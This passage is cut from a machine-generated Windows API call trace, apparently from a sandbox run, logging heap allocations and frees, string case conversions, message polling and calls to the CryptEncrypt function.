(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73fb0 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0123.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0123.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0123.204] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0123.204] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0123.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0123.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0123.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0123.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa300, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0123.209] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0123.209] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0123.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.209] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0123.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.209] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0123.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.209] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0123.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.209] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0123.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa318, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.210] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71d18*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71d18*, pdwDataLen=0x8cef60*=0x8) returned 1 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0123.210] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0123.210] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.210] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0123.210] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.210] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0123.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.210] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0123.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0123.210] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0123.216] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.216] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.216] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.216] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0123.216] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, 